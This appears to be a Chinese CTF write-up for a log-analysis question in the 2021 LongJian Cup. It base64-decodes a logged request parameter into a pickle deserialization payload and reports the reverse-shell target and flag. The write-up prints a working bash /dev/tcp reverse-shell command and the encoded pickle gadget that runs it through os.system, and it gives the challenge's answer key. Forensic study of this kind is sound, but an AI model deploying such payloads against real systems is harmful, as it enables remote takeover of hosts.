当前位置: 首页 > news >正文

[陇剑杯 2021]简单日志分析(问3)

news 2025/10/1 9:18:35

1. 提取最后一条 base64

最后一条日志的 user 参数值为:

text

STAKcDAKMFMnYmFzaCAtaSA+JiAvZGV2L3RjcC8xOTIuMTY4LjIuMTk3Lzg4ODggMD4mMScKcDEKMChnMApscDIKMChJMAp0cDMKMChnMwpJMApkcDQKMGNvcwpzeXN0ZW0KcDUKMGc1CihnMQp0Ui4=

2. Base64 解码

python

import base64payload = "STAKcDAKMFMnYmFzaCAtaSA+JiAvZGV2L3RjcC8xOTIuMTY4LjIuMTk3Lzg4ODggMD4mMScKcDEKMChnMApscDIKMChJMAp0cDMKMChnMwpJMApkcDQKMGNvcwpzeXN0ZW0KcDUKMGc1CihnMQp0Ui4="
decoded = base64.b64decode(payload)
print(decoded)

输出:

text

b'I\x0c0\x0c0S\'bash -i >& /dev/tcp/192.168.2.197/8888 0>&1\'\nw1\n0(g0\nlp2\n0(I0\ntp3\n0(g3\nI0\ndp4\n0cos\nsystem\np5\n0g5\n(g1\ntR.'

可以看到里面明明白白地出现了:

text

bash -i >& /dev/tcp/192.168.2.197/8888 0>&1

3. 结论

反弹 shell 的目标 IP 和端口是:

text

192.168.2.197:8888

最终答案:

text

192.168.2.197:8888
NSSCTF{192.168.2.197:8888}
http://www.dtcms.com/a/427544.html

相关文章:

  • 微信的网站徐州网站设计师
  • CC工具箱使用指南:【整库修复几何】
  • 【完整源码+数据集+部署教程】工厂工人操作机械工作图像分割系统: yolov8-seg-RepHGNetV2
  • 网站设计与制作简单吗可以用来注册网站域名的入口是
  • 怎样做内网网站seo企业网络推广培训
  • C 语言各种指针详解
  • 【个人随想】我们是否缺乏从头再来的勇气
  • 自监督学习在医疗AI中的技术实现路径分析(上)
  • 麻涌手机网站设计建设的网站服务器
  • 五维论-解释万物法则
  • 国际海运业务全流程操作解析:易境通海运系统如何赋能各环节?
  • 【代码随想录day 29】 力扣 406.根据身高重建队列
  • 上海网站建设报价单网站设计平台及开发工具
  • 2006 年真题配套词汇单词笔记(考研真相)
  • Ubuntu 24.04 安装搜狗输入法完整教程
  • 淘宝买cdk自己做网站游戏编程软件
  • 试用网站如何做免费自动交易软件app
  • Linux rsyslog 日志服务及日志转发实践
  • 静态网站flash怎么看网站的访问量
  • 体育如何做原创视频网站潮州seo网站推广
  • d40: vue杂项问题
  • WordPress 安全检查指南:让你的网站更稳定、更安全
  • 类似于wordpress的网站开放平台供稿人计划
  • Vue.js props mutating:反模式如何被视为一种良好实践。
  • 基于STM32与influxDB的电力监控系统-12
  • 学习html的网站网站备案一次就可以了吧
  • Linux兄弟线程唤醒和调度的实现
  • Process Hacker下载和安装教程(附安装包)
  • 坑梓网站建设方案公众号制作网页
  • 企业身份认证系统选型:Azure AD 与 Keycloak 功能详解